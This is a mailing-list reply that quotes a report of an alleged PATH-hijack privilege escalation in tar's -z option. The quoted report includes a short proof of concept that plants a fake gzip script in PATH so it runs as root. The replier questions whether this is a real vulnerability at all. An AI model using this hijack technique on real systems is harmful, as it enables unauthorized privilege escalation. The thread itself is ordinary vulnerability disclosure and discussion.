On Wed, 2021-11-03 at 15:21 +0100, Gregorio Giacobbe wrote:
> Hi!
>
> As per subject, I discovered a Path Hijack vulnerability in the tar binary.
> When using the -z switch for gzip compression/decompression the binary calls
> "gzip" without absolute path, hence allowing the path hijack.
> While this, in a normal scenario, can be totally harmless, it can be used as a
> privilege escalation technique when the tar binary is called as root user.
>
> Following lines will provide a basic PoC:
> ----
> export PATH=$(pwd):$PATH
> echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
> chmod +x gzip
> touch file.txt
> tar -zcf backup.tar.gz file.txt
> ls -la /tmp/tarred
> -rw-r--r-- 1 root root 0 Nov 3 14:05 /tmp/tarred
> ----
>
> I have not tested switches for other compression/decompression formats, so
> there is a chance that they can be used as well as gzip.
>
Do you realize that if you have sufficient access to inject "gzip", you may inject "tar" as well, right?

--
Best regards,
Michał Górny